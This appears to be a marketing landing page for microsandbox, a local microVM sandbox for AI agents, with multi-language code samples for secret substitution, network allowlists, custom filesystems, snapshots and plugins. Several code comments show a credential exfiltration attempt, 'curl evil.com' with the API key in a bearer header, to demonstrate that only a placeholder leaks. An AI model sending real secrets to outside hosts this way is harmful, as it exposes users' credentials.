YC X26 · Launching soon

Every agent deserves
its own machine

Run lightweight microVMs locally on your machine with programmable networking, custom filesystems, and secrets that never leave the host.

macOS · Windows · Linux
Terminal
$ msb pull ghcr.io/pytorch/pytorch:2.3
pulled pytorch:2.3 from ghcr.io 3.2s

$ msb run python:3.12 --name dev
created dev python:3.12 cpu=2 mem=512Mi 187ms

$ msb exec dev -- python -c "print('hello')"
hello

$ msb ps
NAME  IMAGE        STATUS   CPU  MEM
dev   python:3.12  running  2    512Mi

$ msb stop dev
stopped dev 12ms
What Makes It Different

Local microVMs,
not remote containers.

Every sandbox runs as a real microVM on your machine. Networking, filesystems, and secrets are programmable from the host. The guest never knows.

Secrets

Secrets that can't leak

The guest never sees real credentials. microsandbox injects random placeholders and substitutes real values at the network layer, only for verified TLS connections to allowed hosts.

DNS rebinding protection, cloud metadata blocking, and DNS-to-IP binding all activate automatically when secrets are configured. Exfiltration via DNS tunneling, SSRF, or TLS downgrade is blocked by default.
let sb = Sandbox::builder("agent")
  .image("python:3.12")
  .secret_env("OPENAI_API_KEY", key, "api.openai.com")
  .create().await?;

// Inside the sandbox:
// echo $OPENAI_API_KEY → msb_placeholder_a7f3...
//
// curl api.openai.com -H "Bearer $OPENAI_API_KEY"
// → real key injected (TLS verified, host matched)
//
// curl evil.com -H "Bearer $OPENAI_API_KEY"
// → placeholder sent, real key never leaves host
sb = await Sandbox.create("agent", image="python:3.12",
  secrets={"OPENAI_API_KEY": (key, "api.openai.com")}
)

# Inside the sandbox:
# echo $OPENAI_API_KEY → msb_placeholder_a7f3...
#
# curl api.openai.com -H "Bearer $OPENAI_API_KEY"
# → real key injected (TLS verified, host matched)
#
# curl evil.com -H "Bearer $OPENAI_API_KEY"
# → placeholder sent, real key never leaves host
const sb = await Sandbox.create("agent", {
  image: "python:3.12",
  secrets: { "OPENAI_API_KEY": [key, "api.openai.com"] }
});

// Inside the sandbox:
// echo $OPENAI_API_KEY → msb_placeholder_a7f3...
//
// curl api.openai.com -H "Bearer $OPENAI_API_KEY"
// → real key injected (TLS verified, host matched)
//
// curl evil.com -H "Bearer $OPENAI_API_KEY"
// → placeholder sent, real key never leaves host
sb, err := msb.NewSandbox("agent",
  msb.Image("python:3.12"),
  msb.SecretEnv("OPENAI_API_KEY", key, "api.openai.com"),
)

// Inside the sandbox:
// echo $OPENAI_API_KEY → msb_placeholder_a7f3...
//
// curl api.openai.com -H "Bearer $OPENAI_API_KEY"
// → real key injected (TLS verified, host matched)
//
// curl evil.com -H "Bearer $OPENAI_API_KEY"
// → placeholder sent, real key never leaves host
resource "microsandbox_sandbox" "agent" {
  name = "agent"
  image = "python:3.12"

  secret {
    env_name = "OPENAI_API_KEY"
    value = var.openai_api_key
    allowed_host = "api.openai.com"
  }
}

# Guest only sees placeholder.
# Real key injected at network layer
# for verified TLS to api.openai.com only.
$ msb run python:3.12 --name agent \
  --secret-env OPENAI_API_KEY=@env:OPENAI_KEY:api.openai.com

$ msb exec agent -- sh -c 'echo $OPENAI_API_KEY'
  msb_placeholder_a7f3...

# Real key injected only for verified
# TLS connections to api.openai.com
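The substitution rule above can be sketched as host-side logic. This is an illustrative sketch, not the actual implementation; the helper name `rewrite_outbound` and the placeholder and key values are assumptions:

```python
# Hypothetical sketch of the host-side secret substitution rule.
# Names and values here are illustrative, not microsandbox internals.
PLACEHOLDER = "msb_placeholder_a7f3"
REAL_KEY = "sk-live-example"        # hypothetical secret value
ALLOWED_HOST = "api.openai.com"

def rewrite_outbound(body: bytes, host: str, tls_verified: bool) -> bytes:
    """Swap the placeholder for the real key only on a TLS-verified
    connection to the allowed host; everywhere else, only the
    placeholder ever leaves the sandbox."""
    if tls_verified and host == ALLOWED_HOST:
        return body.replace(PLACEHOLDER.encode(), REAL_KEY.encode())
    return body
```

Because the guest only ever holds the placeholder, there is nothing inside the VM worth exfiltrating; the real value exists only in this host-side rewrite.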
Networking

Programmable network layer

Inspect DNS queries, analyze HTTP traffic, drop packets at the IP level, or build custom data loss prevention. The guest sees a normal network stack.

Implement the NetBackend trait for full frame-level control, or use built-in hooks for DNS, HTTP, and TLS. Allowlist domains, block CIDR ranges, intercept TLS with auto-generated certs.
let sb = Sandbox::builder("worker")
  .image("node:20")
  .network(|n| n
    .allow(["api.openai.com", "*.stripe.com"])
    .on_dns(|q| { println!("dns: {}", q.name); DnsAction::Allow })
    .on_http(|req| {
      if contains_pii(&req.body) {
        return HttpAction::Block("DLP: PII detected");
      }
      HttpAction::Forward(req)
    })
    .block_cidr("169.254.0.0/16") // cloud metadata
    .block_cidr("10.0.0.0/8")
  ).create().await?;
sb = await Sandbox.create("worker", image="node:20",
  network=Network(
    allow=["api.openai.com", "*.stripe.com"],
    on_dns=lambda q: (log(f"dns: {q.name}"), DnsAction.ALLOW)[1],
    on_http=lambda req:
      HttpAction.block("DLP: PII") if contains_pii(req.body)
      else HttpAction.forward(req),
    block_cidr=["169.254.0.0/16", "10.0.0.0/8"],
  )
)
const sb = await Sandbox.create("worker", {
  image: "node:20",
  network: {
    allow: ["api.openai.com", "*.stripe.com"],
    onDns: (q) => { log(`dns: ${q.name}`); return "allow"; },
    onHttp: (req) =>
      containsPii(req.body) ? block("DLP: PII") : forward(req),
    blockCidr: ["169.254.0.0/16", "10.0.0.0/8"],
  }
});
sb, _ := msb.NewSandbox("worker",
  msb.Image("node:20"),
  msb.Network(
    msb.Allow("api.openai.com", "*.stripe.com"),
    msb.OnDns(func(q DnsQuery) DnsAction {
      log.Printf("dns: %s", q.Name)
      return DnsAllow
    }),
    msb.BlockCidr("169.254.0.0/16", "10.0.0.0/8"),
  ),
)
resource "microsandbox_sandbox" "worker" {
  name = "worker"
  image = "node:20"

  network {
    allow = ["api.openai.com", "*.stripe.com"]
    block_cidr = ["169.254.0.0/16", "10.0.0.0/8"]
  }
}

# DNS/HTTP hooks configured via plugin
# resources for full traffic inspection.
$ msb run node:20 --name worker \
  --net-allow api.openai.com,*.stripe.com \
  --net-block-cidr 169.254.0.0/16,10.0.0.0/8

# DNS/HTTP inspection hooks require
# a plugin or the SDK.
# CIDR blocking and domain allowlists
# work directly from the CLI.
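The allowlist-plus-CIDR policy the flags above configure can be sketched as a single decision function. A minimal sketch with assumed names (`permit`, `ALLOW`, `BLOCK_CIDRS`), not the real engine:

```python
import fnmatch
import ipaddress

# Illustrative policy mirroring --net-allow and --net-block-cidr above.
ALLOW = ["api.openai.com", "*.stripe.com"]
BLOCK_CIDRS = [
    ipaddress.ip_network("169.254.0.0/16"),  # cloud metadata
    ipaddress.ip_network("10.0.0.0/8"),
]

def permit(host: str, resolved_ip: str) -> bool:
    """A connection passes only if its resolved IP falls outside every
    blocked range AND the domain matches an allowlist pattern."""
    ip = ipaddress.ip_address(resolved_ip)
    if any(ip in net for net in BLOCK_CIDRS):
        return False
    return any(fnmatch.fnmatch(host, pat) for pat in ALLOW)
```

Note the ordering: the IP check runs first, so an allowed domain that resolves into a blocked range (the classic metadata-service trick) is still refused.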
Filesystems

Extensible filesystem backends

Mount custom filesystem implementations into any sandbox. Intercept reads and writes, build virtual filesystems, or proxy to remote storage, all through a single trait.

The DynFileSystem trait provides ~40 POSIX-compatible methods. Built-in backends include passthrough, overlay, in-memory, and ProxyFs for hooking into any other backend. Zero-copy I/O.
struct AuditFs { inner: PassthroughFs }

impl DynFileSystem for AuditFs {
  fn open(&self, ctx: Context, ino: u64, flags: u32) -> Result<u64> {
    println!("open ino={ino} pid={}", ctx.pid);
    self.inner.open(ctx, ino, flags)
  }
  // read, write, lookup, mkdir, unlink ...
}

let audit = AuditFs::new("./data")?;
let sb = Sandbox::builder("app")
  .image("python:3.12")
  .volume("/data", |v| v.backend(audit))
  .volume("/cache", |v| v.backend(MemFs::new()))
  .create().await?;
class AuditFs(FileSystemBackend):
  def open(self, ctx, ino, flags):
    log(f"open ino={ino} pid={ctx.pid}")
    return self.inner.open(ctx, ino, flags)
  # read, write, lookup, mkdir, unlink ...

sb = await Sandbox.create("app", image="python:3.12",
  volumes={
    "/data": AuditFs("./data"),
    "/cache": MemFs(),
  }
)
class AuditFs extends FileSystemBackend {
  open(ctx, ino, flags) {
    log(`open ino=${ino} pid=${ctx.pid}`);
    return this.inner.open(ctx, ino, flags);
  }
  // read, write, lookup, mkdir, unlink ...
}

const sb = await Sandbox.create("app", {
  image: "python:3.12",
  volumes: {
    "/data": new AuditFs("./data"),
    "/cache": new MemFs(),
  }
});
type AuditFs struct{ inner PassthroughFs }

func (a *AuditFs) Open(ctx Context, ino uint64, flags uint32) (uint64, error) {
  log.Printf("open ino=%d pid=%d", ino, ctx.Pid)
  return a.inner.Open(ctx, ino, flags)
}

sb, _ := msb.NewSandbox("app",
  msb.Image("python:3.12"),
  msb.Volume("/data", &AuditFs{NewPassthrough("./data")}),
  msb.Volume("/cache", msb.NewMemFs()),
)
resource "microsandbox_sandbox" "app" {
  name = "app"
  image = "python:3.12"

  volume {
    mount_path = "/data"
    backend = "passthrough"
    source = "./data"
  }

  volume {
    mount_path = "/cache"
    backend = "memory"
  }
}
$ msb run python:3.12 --name app \
  --volume ./data:/data \
  --volume-mem /cache

# Custom filesystem backends (AuditFs, etc.)
# require the SDK or a filesystem plugin.
# Built-in backends: passthrough, memory,
# overlay available from the CLI.
Snapshots

Snapshot, fork, restore

Save full VM state (memory, CPU registers, filesystem) and fork hundreds of identical sandboxes from one baseline. Sub-millisecond restore, no re-boot.

Install dependencies once, snapshot, then fork workers on demand. Each fork gets a copy-on-write filesystem overlay. Restore with overrides to change memory, CPU, or environment.
let sb = Sandbox::builder("base")
  .image("python:3.12")
  .create().await?;
sb.exec("pip install numpy pandas torch").await?;

let snap = sb.snapshot().await?;
snap.save_named("ml-ready").await?;

// Fork 100 workers from the same baseline
let workers = futures::future::try_join_all((0..100).map(|i| {
  snap.restore_with(format!("w-{i}"), |r| r.env("WORKER_ID", &i.to_string()))
})).await?;
sb = await Sandbox.create("base", image="python:3.12")
await sb.exec("pip install numpy pandas torch")

snap = await sb.snapshot("ml-ready")

# Fork 100 workers from the same baseline
workers = await asyncio.gather(*[
  snap.restore(f"w-{i}", env={"WORKER_ID": str(i)})
  for i in range(100)
])
const sb = await Sandbox.create("base", { image: "python:3.12" });
await sb.exec("pip install numpy pandas torch");

const snap = await sb.snapshot("ml-ready");

// Fork 100 workers from the same baseline
const workers = await Promise.all(
  Array.from({ length: 100 }, (_, i) =>
    snap.restore(`w-${i}`, { env: { WORKER_ID: String(i) } })
  )
);
sb, _ := msb.NewSandbox("base", msb.Image("python:3.12"))
sb.Exec(ctx, "pip install numpy pandas torch")

snap, _ := sb.Snapshot(ctx, "ml-ready")

// Fork 100 workers from the same baseline
var g errgroup.Group
for i := range 100 {
  g.Go(func() error {
    _, err := snap.Restore(ctx, fmt.Sprintf("w-%d", i),
      msb.Env("WORKER_ID", strconv.Itoa(i)))
    return err
  })
}
resource "microsandbox_sandbox" "base" {
  name = "base"
  image = "python:3.12"
}

resource "microsandbox_snapshot" "ml_ready" {
  sandbox = microsandbox_sandbox.base.name
  name = "ml-ready"
}

resource "microsandbox_sandbox" "worker" {
  count = 100
  name = "w-${count.index}"
  from_snapshot = microsandbox_snapshot.ml_ready.name
  env = { WORKER_ID = count.index }
}
$ msb run python:3.12 --name base
$ msb exec base -- pip install numpy pandas torch

$ msb snapshot base --name ml-ready

# Fork 100 workers from the same baseline
$ for i in $(seq 0 99); do
    msb restore ml-ready --name w-$i \
      --env WORKER_ID=$i &
  done
Plugins

Composable plugin system

Extend sandbox behavior with in-process Rust plugins or out-of-process plugins in any language. Hook into lifecycle, exec, filesystem, or network events.

Plugins compose. Stack an audit logger, a rate limiter, and a custom network monitor on the same sandbox. Browse and install from the plugin registry, or publish your own network, filesystem, and lifecycle plugins for others to use.
let sb = Sandbox::builder("app")
  .image("python:3.12")
  .plugin(AuditLog::new("/var/log/audit"))
  .plugin(RateLimiter::new(100)) // 100 exec/s
  .plugin_process("node ./plugins/monitor.js")
  .plugin_process("python ./plugins/dlp.py")
  .create().await?;

// Hooks: lifecycle, exec, events,
// filesystem, network, agent extensions
sb = await Sandbox.create("app", image="python:3.12",
  plugins=[
    AuditLog("/var/log/audit"),
    RateLimiter(max_exec_per_sec=100),
  ],
  plugin_processes=[
    "node ./plugins/monitor.js",
    "python ./plugins/dlp.py",
  ]
)

# Hooks: lifecycle, exec, events,
# filesystem, network, agent extensions
const sb = await Sandbox.create("app", {
  image: "python:3.12",
  plugins: [
    new AuditLog("/var/log/audit"),
    new RateLimiter({ maxExecPerSec: 100 }),
  ],
  pluginProcesses: [
    "node ./plugins/monitor.js",
    "python ./plugins/dlp.py",
  ]
});

// Hooks: lifecycle, exec, events,
// filesystem, network, agent extensions
sb, _ := msb.NewSandbox("app",
  msb.Image("python:3.12"),
  msb.Plugin(NewAuditLog("/var/log/audit")),
  msb.Plugin(NewRateLimiter(100)),
  msb.PluginProcess("node ./plugins/monitor.js"),
  msb.PluginProcess("python ./plugins/dlp.py"),
)

// Hooks: lifecycle, exec, events,
// filesystem, network, agent extensions
resource "microsandbox_sandbox" "app" {
  name = "app"
  image = "python:3.12"

  plugin {
    name = "audit-log"
    log_dir = "/var/log/audit"
  }

  plugin {
    name = "rate-limiter"
    max_exec_per_s = 100
  }

  plugin_process = [
    "node ./plugins/monitor.js",
    "python ./plugins/dlp.py",
  ]
}
$ msb run python:3.12 --name app \
  --plugin audit-log --plugin rate-limiter \
  --plugin-process "node ./plugins/monitor.js" \
  --plugin-process "python ./plugins/dlp.py"

# Browse the plugin registry
$ msb plugin search network
$ msb plugin install msb-dlp
Multi-Agent

Spawn sandboxes from sandboxes

Code running inside a sandbox can spawn peer sandboxes alongside itself. Perfect for multi-agent systems where each agent gets its own isolated environment. Fails safely if not running inside a microsandbox.

Peer sandboxes inherit nothing by default. Each gets its own network, filesystem, and secrets. The orchestrator coordinates via the SDK, not shared state.
// Running inside a microsandbox
let rt = Sandbox::current_runtime().await?;

// Spawn peer sandboxes (isolated, same level)
let researcher = rt.start("researcher")
  .image("python:3.12")
  .secret_env("SERP_KEY", key, "serpapi.com")
  .create().await?;

let coder = rt.start("coder")
  .image("node:20")
  .network(|n| n.deny_all()) // air-gapped
  .create().await?;
# Running inside a microsandbox
rt = await Sandbox.current_runtime()

# Spawn peer sandboxes (isolated, same level)
researcher = await rt.start("researcher",
  image="python:3.12",
  secrets={"SERP_KEY": (key, "serpapi.com")},
)

coder = await rt.start("coder",
  image="node:20",
  network=Network(deny_all=True), # air-gapped
)
// Running inside a microsandbox
const rt = await Sandbox.currentRuntime();

// Spawn peer sandboxes (isolated, same level)
const researcher = await rt.start("researcher", {
  image: "python:3.12",
  secrets: { "SERP_KEY": [key, "serpapi.com"] },
});

const coder = await rt.start("coder", {
  image: "node:20",
  network: { denyAll: true }, // air-gapped
});
// Running inside a microsandbox
rt, _ := msb.CurrentRuntime(ctx)

// Spawn peer sandboxes (isolated, same level)
researcher, _ := rt.Start("researcher",
  msb.Image("python:3.12"),
  msb.SecretEnv("SERP_KEY", key, "serpapi.com"),
)

coder, _ := rt.Start("coder",
  msb.Image("node:20"),
  msb.Network(msb.DenyAll()), // air-gapped
)
# Orchestrator sandbox can spawn peers
resource "microsandbox_sandbox" "orchestrator" {
  name = "orchestrator"
  image = "python:3.12"
}

resource "microsandbox_sandbox" "researcher" {
  name = "researcher"
  image = "python:3.12"
  spawned_by = microsandbox_sandbox.orchestrator.name

  secret {
    env_name = "SERP_KEY"
    allowed_host = "serpapi.com"
  }
}

resource "microsandbox_sandbox" "coder" {
  name = "coder"
  image = "node:20"
  spawned_by = microsandbox_sandbox.orchestrator.name
  network { deny_all = true }
}
# From inside a running microsandbox:
$ msb start researcher \
  --image python:3.12 \
  --secret-env SERP_KEY=@env:SERP_KEY:serpapi.com

$ msb start coder \
  --image node:20 \
  --net-deny-all

# Fails if not running inside a microsandbox
Cloud Sync

Local sandboxes, resume anywhere

Sync sandbox filesystems to the cloud. Pick up exactly where you left off from any machine. Same files, same environment.

Starting with filesystem replication. Memory snapshotting and auto-sync coming next. Start on your laptop, continue on a remote machine, pull back to local. No rebuild, no re-setup.
let sb = Sandbox::builder("ml-project")
  .image("python:3.12")
  .create().await?;
sb.exec("pip install torch").await?;

// Push filesystem state to the cloud
sb.push().await?;

// On another machine: pull and resume
let sb = Sandbox::pull("ml-project").await?;
sb.start().await?;
sb = await Sandbox.create("ml-project", image="python:3.12")
await sb.exec("pip install torch")

# Push filesystem state to the cloud
await sb.push()

# On another machine: pull and resume
sb = await Sandbox.pull("ml-project")
await sb.start()
const sb = await Sandbox.create("ml-project", {
  image: "python:3.12",
});
await sb.exec("pip install torch");

// Push filesystem state to the cloud
await sb.push();

// On another machine: pull and resume
const pulled = await Sandbox.pull("ml-project");
await pulled.start();
sb, _ := msb.NewSandbox("ml-project",
  msb.Image("python:3.12"),
)
sb.Exec(ctx, "pip install torch")

// Push filesystem state to the cloud
sb.Push(ctx)

// On another machine: pull and resume
sb, _ = msb.Pull(ctx, "ml-project")
sb.Start(ctx)
resource "microsandbox_sandbox" "ml_project" {
  name = "ml-project"
  image = "python:3.12"

  sync {
    enabled = true
  }
}

# Filesystem state is synced to the cloud.
# Pull from any machine with:
# msb pull ml-project
# msb start ml-project
$ msb run python:3.12 --name ml-project
$ msb exec ml-project -- pip install torch

# Push filesystem state to the cloud
$ msb push ml-project

# On another machine: pull and resume
$ msb pull ml-project
$ msb start ml-project
Projects

Declarative multi-sandbox projects

Define your entire environment in a Sandboxfile. Per-sandbox secrets, network policies, dependency ordering, and scripts. Think Compose, but for microVMs.

Restore sandboxes from snapshots instead of booting fresh. Share volumes across sandboxes. Pull from any OCI-compatible registry. Run with msb project up -d.
Sandboxfile
name: my-project

volumes:
  data: { size: 10G }

sandboxes:
  api:
    image: python:3.11
    volumes: [./src:/app, data:/data]
    ports: [8000:8000]
    secrets: [OPENAI_API_KEY]
    network:
      allow: [api.openai.com]
      dns: { rebind_protection: strict }
    scripts:
      start: python app.py
      test: pytest

  worker:
    from_snapshot: ml-ready
    memory: 2G
    depends_on: [api]
Why Local-First

Your sandboxes should run
on your machine.

No round-trips to a remote API. Real VM isolation, programmable from the host, at container speed.

                 microsandbox                    Remote sandboxes
Runs on          Your machine                    Vendor cloud
Latency          Local (<1ms)                    Network round-trip
Isolation        MicroVM (hardware)              Varies (containers/VMs)
Network control  Programmable per-sandbox        Limited / none
Filesystem       Custom backends (trait)         Fixed / opaque
Secrets          Host-side substitution          Sent to vendor
Offline          Works offline                   Requires internet
Cost             Free (cloud sync: fair usage)   Per-minute billing
Plugins          Extensible (any language)       Vendor API only
Platforms        macOS, Windows, Linux           Browser / API
And Also

The details matter

<200ms Boot

libkrun microVMs, not QEMU. Pre-patched kernel as a shared library. Zero-copy mmap.

DNS Rebinding Protection

Blocks private IPs in DNS responses. Per-connection IP pinning. Cloud metadata blocked.
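The rebinding defense described above boils down to two checks, sketched here in Python; the function name and the pinning map are hypothetical, not the real resolver hook:

```python
import ipaddress

# Illustrative sketch: reject private/link-local answers, then pin the
# first public answer per hostname so later re-resolutions can't swap IPs.
_pinned: dict[str, str] = {}  # hostname -> pinned IP (assumed structure)

def accept_answer(host: str, ip_str: str) -> bool:
    ip = ipaddress.ip_address(ip_str)
    if ip.is_private or ip.is_link_local or ip.is_loopback:
        return False              # private IP in a public answer: rebinding
    pinned = _pinned.setdefault(host, ip_str)
    return pinned == ip_str       # later answers must match the pinned IP
```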

TLS Interception

Auto-generated certs, per-domain bypass. Inspect HTTPS without guest awareness.

Any OCI Registry

Pull from Docker Hub, GHCR, ECR, GCR, or any OCI-compatible registry. Your existing images work.

No Daemon

Embeds the runtime directly. No root process, no socket, no background service.

Cross-Platform

Native on macOS, Windows, and Linux. Same CLI, same SDKs, same Sandboxfile everywhere.

Get early access

Local-first sandboxes are coming. Join the waitlist to get early access.


Want to talk first? Schedule a call